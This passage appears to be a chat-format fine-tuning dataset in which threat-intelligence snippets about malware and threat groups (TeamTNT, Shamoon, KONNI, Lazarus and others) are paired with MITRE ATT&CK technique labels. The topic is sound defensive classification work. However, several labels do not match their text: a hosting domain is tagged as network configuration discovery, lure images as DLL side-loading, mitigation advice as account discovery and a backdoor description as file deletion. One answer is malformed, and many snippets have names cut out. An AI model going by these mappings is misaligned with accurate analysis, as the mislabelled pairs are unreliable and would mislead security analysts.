- "content": "TeamTNT has the \"curl\" and \"wget\" commands as well as batch scripts to download new tools."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has the capability to gather the victim's current directory."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FELIXROOT collects the username from the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POLONIUM has created and used legitimate Microsoft OneDrive accounts for their operations."
- },
- {
- "role": "assistant",
- "content": "T1583.006 - Web Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LaZagne can obtain credentials from chats, databases, mail, and WiFi."
- },
- {
- "role": "assistant",
- "content": "T1552.001 - Unsecured Credentials: Credentials In Files"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "surveys a system upon check-in to discover information in the Windows Registry with the reg query command."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OilRig can download remote files onto victims."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rocke has executed wget and curl commands to Pastebin over the HTTPS protocol."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The mericcs.org domain was used as the sender address, as well as the hosting location of the malicious RTF document"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Note that the browser itself is not hooked. Executing the browser from any other Chrome shortcut link will start and run it normally without the malicious extension, canceling out the malware’s ability to control what the victim does"
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The 's Information Gathering Tool (IGT) includes PowerShell components."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UBoatRAT can list running processes on the system."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KONNI has duplicated the token of a high integrity process to spawn an instance of cmd.exe under an impersonated user."
- },
- {
- "role": "assistant",
- "content": "T1134.002 - Create Process with Token"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If a victim meets certain criteria, T9000 uses the AppInit_DLL functionality to achieve persistence by ensuring that every user mode process that is spawned will load its malicious DLL, ResN32.dll. It does this by creating the following Registry keys: \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_DLLs – %APPDATA%\\Intel\\ResN32.dll\" and \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\LoadAppInit_DLLs – 0x1\"."
- },
- {
- "role": "assistant",
- "content": "T1546.010 - Event Triggered Execution: AppInit DLLs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sykipot is known to contain functionality that enables targeting of smart card technologies to proxy authentication for connections to restricted network resources using detected hardware tokens."
- },
- {
- "role": "assistant",
- "content": "T1111 - Multi-Factor Authentication Interception"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team has tricked unwitting recipients into clicking on malicious hyperlinks within emails crafted to resemble trustworthy senders."
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Indicators File Hash Description x.js 3fefa55daeb167931975c22df3eca20a HOMEFRY, a 64-bit Windows password dumper/cracker mt.exe 40528e368d323db0ac5c3f5e1efe4889 MURKYTOP, a command-line reconnaissance tool com4.js a68bf5fce22e7f1d6f999b7a580ae477 AIRBREAK, a JavaScript-based backdoor which retrieves commands from hidden strings in compromised webpages Historical Indicators File Hash Description green.ddd 3eb6f85ac046a96204096ab65bbd3e7e AIRBREAK, a JavaScript-based backdoor which retrieves commands from hidden strings in compromised webpages BGij 6e843ef4856336fe3ef4ed27a4c792b1 Beacon, a commercially available backdoor msresamn.ttf a9e7539c1ebe857bae6efceefaa9dd16 PHOTO, also reported as Derusbi 1024-aa6a121f98330df2edee6c4391df21ff43a33604 bd9e4c82bf12c4e7a58221fc52fed705 BADFLICK, backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command-and-control configuration"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Commands under net user can be used in to gather information about and manipulate user accounts."
- },
- {
- "role": "assistant",
- "content": "T1087 - Account Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "named its tools to masquerade as Windows or Adobe Reader software, such as by using the file name adobecms.exe and the directory CSIDL_APPDATA\\microsoft\\security."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attack targeted at least one organization in Saudi Arabia, which aligns with the targeting of the initial Shamoon attacks. It appears the purpose of the new Disttrack samples were solely focused on destruction, as the samples were configured with a non-operational C2 server to report to and were set to begin wiping data exactly on 2016/11/17 20:45. Disttrack uses the internal domain names and credentials to log into remote systems on the same network segment. The dropper then attempts to open the service manager on each remote system to start the RemoteRegistry service, which it will connect to using RegConnectRegistryW. The dropper then checks to see if it has administrator privileges on the remote system by attempting to open \"\\system32\\csrss.exe\", which allows it to determine if it can write its payload to the \"\\system32\" folder on the remote system. Scheduled tasks require a time in which the task will run, which the dropper determines by calling the function NetRemoteTOD to obtain the time of day from the remote system. While completely speculative, the word “shinu” used as a parameter could be a reference to the Arabic slang for the word “what”, as well as a reference to a village name in northwestern Iran. It appears that the “drdisk.sys” driver (SHA256: 4744df6ac02ff0a3f9ad0bf47b15854bbebb73c936dd02f7c79293a2828406f6) is the exact same driver as used in the Shamoon attack in 2012. During this activity, we noticed the wiper changing the system time to August 2012, as the temporary license key for the RawDisk driver requires the system time to not exceed the month of August, which is when the temporary license would expire. The current attack campaign has several TTP overlaps with the original Shamoon campaign, especially from a targeting and timing perspective"
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Magic Hound has lured victims into executing malicious files."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 1 Side-by-side of the lure images within ThreeDollars in the October 2017 and the January 2018 attacks Superficially, we can immediately see the images are quite similar, but with some glaring differences"
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FunnyDream can use com objects identified with `CLSID_ShellLink`(`IShellLink` and `IPersistFile`) and `WScript.Shell`(`RegWrite` method) to enable persistence mechanisms."
- },
- {
- "role": "assistant",
- "content": "T1559.001 - Component Object Model"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BoxCaon can download files."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware performs the following activities: Builds imports by dynamically loading APIs Decrypts strings needed for control server communications Performs control server communications Handles commands issued by the control server Uninstalls self from the system The malicious thread dynamically loads the APIs it needs at the beginning of its execution using LoadLibrary() and GetProcAddress()"
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The loader implements itself with the name Security Support Provider, a legitimate Windows function. Various .exe files mimic legitimate file names used by Microsoft, Symantec, Kaspersky, Hewlett-Packard, and VMWare. also disguised malicious modules using similar filenames as custom network encryption software on victims."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stolen Pencil utilized RDP for direct remote point-and-click access."
- },
- {
- "role": "assistant",
- "content": "T1021.001 - Remote Services: Remote Desktop Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DustySky can compress files via RAR while staging data to be exfiltrated."
- },
- {
- "role": "assistant",
- "content": "T1560.001 - Archive Collected Data: Archive via Utility"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SideCopy has identified the IP address of a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Night Dragon, threat actors enticed users to click on links in spearphishing emails to download malware."
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT38 used a Trojan called KEYLIME to capture keystrokes from the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The executable version of Helminth has a module to log clipboard contents."
- },
- {
- "role": "assistant",
- "content": "T1115 - Clipboard Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Wocao, threat actors used scheduled tasks to execute malicious PowerShell code on remote systems."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Siloscape searches for the Kubernetes config file and other related files using a regular expression."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Axiom has used steganography to hide its C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1001.002 - Data Obfuscation via Steganography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike has the ability to use an Excel Workbook to execute additional code by enabling Office to trust macros and execute code without user permission."
- },
- {
- "role": "assistant",
- "content": "T1137.001 - Office Application Startup: Office Template Macros."
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TA505 has used VBS for code execution."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "accesses network share(s), enables share access to the target device, and copies an executable payload to the target system, and uses a to execute the malware."
- },
- {
- "role": "assistant",
- "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Upon execution, the Micropsia malware takes screenshots every 90 seconds by calling to Gdi32.BitBlt API. Screenshots are saved as unencrypted files in JPEG format with a specific file name that contains the current timestamp (yyyy-mm-dd hh-nn-ss) with the hardcoded extension .his"
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SILENTTRINITY can scan for open ports on a compromised machine."
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MuddyWater has used Daniel Bohannon’s Invoke-Obfuscation framework and obfuscated PowerShell scripts. The group has also used other obfuscation methods, including Base64 obfuscation of VBScripts and PowerShell commands."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Opening document starts a template injection technique for loading the document template from the internet."
- },
- {
- "role": "assistant",
- "content": "T1221 - Template Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mustang Panda has used a customized PlugX variant which could exfiltrate documents from air-gapped networks."
- },
- {
- "role": "assistant",
- "content": "T1052.001 - Exfiltration over USB"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HAWKBALL can collect the OS version, architecture information, and computer name."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In January 2016 we published our analysis of a spearphishing attack against energy companies in Ukraine. That attack probably has a connection to the infamous BlackEnergy attacks in 2015 because the attackers used exactly the same mail server to send spearphishing messages. However, the attacks in January 2016 were different. Instead of using the BlackEnergy malware family, the attackers used a relatively simple open-source backdoor, written in the Python programming language, called GCat. The Python code of the GCat backdoor was obfuscated, then converted into a stand-alone executable using the PyInstaller program"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "identified and browsed file servers in the victim network, sometimes , viewing files pertaining to ICS or Supervisory Control and Data Acquisition (SCADA) systems."
- },
- {
- "role": "assistant",
- "content": "T1135 - Network Share Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Contacts an IP address / domain that was used to host a malicious document from a Lazarus previous campaign in 2017 - Same author appeared in these recent malicious documents that also appeared back in Lazarus 2017 campaigns - Uses the same malicious document structure and similar job recruitment ads as what we observed in past Lazarus campaigns - The techniques, tactics and procedures align with Lazarus group’s interest in crypto currency theft"
- },
- {
- "role": "assistant",
- "content": "T1001.003 - Protocol or Service Impersonation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bandook can collect information about the drives available on the system."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "may use WMI when collecting information about a victim."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ROKRAT can use the `GetForegroundWindow` and `GetWindowText` APIs to discover where the user is typing."
- },
- {
- "role": "assistant",
- "content": "T1010 - Application Window Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group has queried an active directory server to obtain the list of accounts, including administrator accounts."
- },
- {
- "role": "assistant",
- "content": "T1087.002 - Account Discovery: Domain Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "prompts users for their credentials."
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In order to avoid raising suspicions from the victim, CSPY Downloader exploits a known UAC bypass technique that uses the SilentCleanup task to execute the binary with elevated privileges"
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can enumerate Registry keys."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "VBShower has attempted to complicate forensic analysis by deleting all the files contained in \"%APPDATA%\\..\\Local\\Temporary Internet Files\\Content.Word\" and \"%APPDATA%\\..\\Local Settings\\Temporary Internet Files\\Content.Word\\\"."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Restricting these privileges may prevent malware from running or limit its capability to spread through the network.Carefully consider the risks before granting administrative rights to users on their own machines.Scrub and verify all administrator accounts regularly.Configure Group Policy to restrict all users to only one login session, where possible.Enforce secure network authentication, where possible.Instruct administrators to use non-privileged accounts for standard functions such as web browsing or checking webmail.Segment networks into logical enclaves and restrict host-to-host communication paths"
- },
- {
- "role": "assistant",
- "content": "T1087 - Account Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Watches uninstall time, checks time diff (local time vs internet time)"
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In order to download the additional modules, the malware uses the BITSAdmin tool, which this group has relied on for some years to avoid detection, since this is an allowlisted tool from the Windows operating system. By the end of September 2019, we started seeing a new version of Guildma malware being distributed that used a new technique for storing downloaded payloads in NTFS Alternate Data Streams in order to conceal their presence in the system"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Because the DLL/EXE is loaded reflectively, it is not displayed when tools are used to list the DLLs of a running process. This tool can be run on remote servers by supplying a local Windows PE file (DLL/EXE) to load in to memory on the remote system, this will load and execute the DLL/EXE in to memory without writing any files to disk."
- },
- {
- "role": "assistant",
- "content": "T1620 - Reflective Code Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CallMe exfiltrates data to its C2 server over the same protocol as C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Containment provided by enclaving also makes incident cleanup significantly less costly.Configure firewalls to disallow Remote Desktop Protocol (RDP) traffic coming from outside of the network boundary, except for in specific configurations such as when tunneled through a secondary virtual private network (VPN) with lower privileges.Audit existing firewall rules and close all ports that are not explicitly needed for business"
- },
- {
- "role": "assistant",
- "content": "T1021.001 - Remote Services: Remote Desktop Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Calisto installation file is an unsigned DMG image under the guise of Intego’s security solution for Mac"
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "actors leverage legitimate credentials to log into external remote services."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts', 'T1133 - External Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bazar can enumerate shared drives on the domain."
- },
- {
- "role": "assistant",
- "content": "T1135 - Network Share Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is capable of deleting Registry keys, sub-keys, and values on a victim system."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SLOTHFULMEDIA can inject into running processes on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GALLIUM used PowerShell for execution to assist in lateral movement as well as for dumping credentials stored on compromised machines."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Types of attacks possibly averted include Structured Query Language (SQL) injection, cross-site scripting, and command injection.Use stringent file reputation settings – Tune the file reputation systems of your anti-virus software to the most aggressive setting possible"
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
